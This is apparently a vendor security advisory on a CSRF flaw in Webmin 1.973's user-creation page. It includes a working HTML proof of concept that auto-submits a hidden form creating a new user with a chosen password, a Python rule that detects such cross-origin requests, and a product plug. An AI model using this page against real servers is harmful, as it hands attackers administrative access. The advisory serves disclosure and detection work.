
Webmin 1.973 'Create Admin User' Cross-Site Request Forgery



Application Details

Webmin is a web-based system administration tool for Unix-like servers and services. It has over 1,000,000 installations worldwide. With Webmin, it is possible to configure operating system internals such as users, disk quotas, services, and configuration files, as well as to modify and control open-source applications such as BIND DNS Server, Apache HTTP Server, PHP, MySQL, and many more.


Vulnerability

Webmin is vulnerable to cross-site request forgery, caused by improper validation of user-supplied input by the add users feature.


Identification

By persuading an authenticated user to visit a malicious Web site, a remote attacker could send a malformed HTTP request to create a privileged user. An attacker could exploit this vulnerability to perform cross-site scripting attacks, Web cache poisoning, and other malicious activities.


<html>
  <body>
  <script>history.pushState('', '', '/')</script>
    <form action="http://target/acl/save_user.cgi" method="POST">
      <input type="hidden" name="name" value="name123" />
      <input type="hidden" name="pass_def" value="0" />
      <input type="hidden" name="pass" value="password123" />
      <input type="hidden" name="mod" value="usermin" />
      <input type="submit" value="Submit request" />
    </form>
    <script>
      document.forms[0].submit();
    </script>
  </body>
</html>


Detection

By turning this proof-of-concept request into traffic files and matching rules, we are able to detect attempts to create an admin user via CSRF.
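As an illustration of the kind of check a matching rule can make, the following added example (not Idappcom's signatures and not part of the original advisory) flags POST requests to the save_user.cgi endpoint from the proof of concept when the Origin or Referer host does not match the Host header. The function names, the host webmin.example:10000 and the sample requests are constructed for this example.

```python
from urllib.parse import urlsplit, parse_qs

TARGET_PATH = "/acl/save_user.cgi"  # endpoint taken from the proof of concept

def parse_request(raw):
    """Split a raw HTTP/1.1 request into method, path, headers and body."""
    head, _, body = raw.partition("\r\n\r\n")
    lines = head.split("\r\n")
    method, target, _ = lines[0].split(" ", 2)
    headers = {}
    for line in lines[1:]:
        name, _, value = line.partition(":")
        headers[name.strip().lower()] = value.strip()
    return method, urlsplit(target).path, headers, body

def check_csrf_user_create(raw):
    """Return an alert for a non-same-origin POST to save_user.cgi, else None."""
    method, path, headers, body = parse_request(raw)
    if method != "POST" or path != TARGET_PATH:
        return None
    host = headers.get("host", "").lower()
    source = headers.get("origin") or headers.get("referer") or ""
    source_host = urlsplit(source).netloc.lower()
    if host and source_host == host:
        return None  # form submitted from the Webmin UI itself
    return {
        # A missing header is weaker evidence than a mismatch; triage accordingly.
        "reason": "cross-origin" if source_host else "no Origin/Referer",
        "source": source_host or None,
        "new_user": parse_qs(body).get("name", [None])[0],
    }

def build_request(origin=None, method="POST"):
    """Constructed sample request carrying the proof-of-concept form fields."""
    lines = [method + " /acl/save_user.cgi HTTP/1.1", "Host: webmin.example:10000",
             "Content-Type: application/x-www-form-urlencoded"]
    if origin:
        lines.append("Origin: " + origin)
    body = "name=name123&pass_def=0&pass=password123&mod=usermin"
    return "\r\n".join(lines) + "\r\n\r\n" + body

if __name__ == "__main__":
    for origin in ("https://webmin.example:10000", "http://attacker.example", None):
        print(origin, "->", check_csrf_user_create(build_request(origin)))
```

The same-origin request produces no alert, while the cross-origin one is reported together with the account name it tried to create.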


Coverage

Idappcom has created signatures 8021569 and 8021570 along with traffic files.


Traffic IQ

If you are concerned that your business may be at risk from this vulnerability or others, why not try out our Traffic IQ software, which can scan your defences and report any issues? Learn more here: https://www.idappcom.co.uk/traffic-iq-professional
